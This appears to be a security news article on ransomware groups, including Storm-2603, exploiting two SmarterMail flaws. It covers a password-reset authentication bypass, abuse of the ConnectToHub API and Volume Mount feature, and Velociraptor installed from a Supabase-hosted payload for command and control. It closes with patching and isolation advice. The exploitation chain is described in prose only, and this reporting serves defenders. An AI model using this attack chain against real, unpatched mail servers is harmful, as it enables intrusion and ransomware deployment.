Ransomware groups are actively exploiting two recently patched SmarterTools SmarterMail vulnerabilities that could lead to remote code execution (RCE) without authentication.The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added one of the critical flaws, tracked as CVE-2026-24423, to its Known Exploited Vulnerabilities catalog on Thursday, flagging it as being actively exploited in ransomware campaigns.CVE-2026-24423, which was patched on Jan. 23, 2026, allows attackers to abuse SmarterMail’s ConnectToHub API to deliver a malicious OS command from a remote server, achieving unauthenticated RCE.The other critical flaw, tracked as CVE-2026-23760, enables authentication bypass via the password reset API. The force-reset-password endpoint fails to verify that the supplied old password is correct, allowing anyone to reset a password by supplying just a username. This could be exploited to reset administrator passwords and gain full control over a vulnerable SmarterMail instance.
Related reading:
The Volume Mount feature allows administrators to provide commands for mounting network drives but accepts arbitrary commands due to trust in the administrator role, ReliaQuest explained. After leveraging the password reset flaw to gain admin access, Storm-2603 used this feature to execute malicious commands and install the forensic software Velociraptor, which it uses as a backdoor.Velociraptor is a legitimate open-source endpoint monitoring, digital forensics and incident response software that Storm-2603 has been known to abuse for command-and-control (C2) communications and staging for Warlock ransomware.In the attack targeting SmarterMail for initial access, the group used the SmarterMail process MailService.exe to spawn a command shell and ultimately trigger the Windows Installer to install a payload called v4.msi hosted on the legitimate cloud-based platform Supabase. ReliaQuest noted that Storm-2603 previously hosted payloads on GitHub, with the shift to Supabase likely aiding in evasion due to the platform’s trusted reputation. The v4.msi payload installs Velociraptor, which is then configured for C2 connection to the attacker’s server. The use of legitimate forensics software also lowers the chance of detection, and typically precedes Warlock ransomware deployment in Storm-2603 attacks.ReliaQuest said it also observed suspicious ConnecToHub API calls on the affected SmarterMail server, indicating likely scanning for susceptibility to CVE-2026-24423. However, these calls came from separate infrastructure than that used by Storm-2603 and may have originated from a different threat actor.The researchers noted that both vulnerabilities offer a path to RCE for threat actors and that the discovery of artifacts for both vulnerabilities on the same instance highlights the urgent need to patch both flaws.Both flaws can be resolved by upgrading to SmarterMail Build 9511. ReliaQuest also recommends isolation of the mail server from the rest of the internal network and restriction of outbound mail server traffic to only necessary email protocols.
Ransomware, Vulnerability Management, Patch/Configuration Management, Email security
SmarterMail vulnerabilities exploited in ransomware campaigns

An In-Depth Guide to Ransomware
Get essential knowledge and practical strategies to protect your organization from ransomware attacks.
Related Events
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news
You can skip this ad in 5 seconds



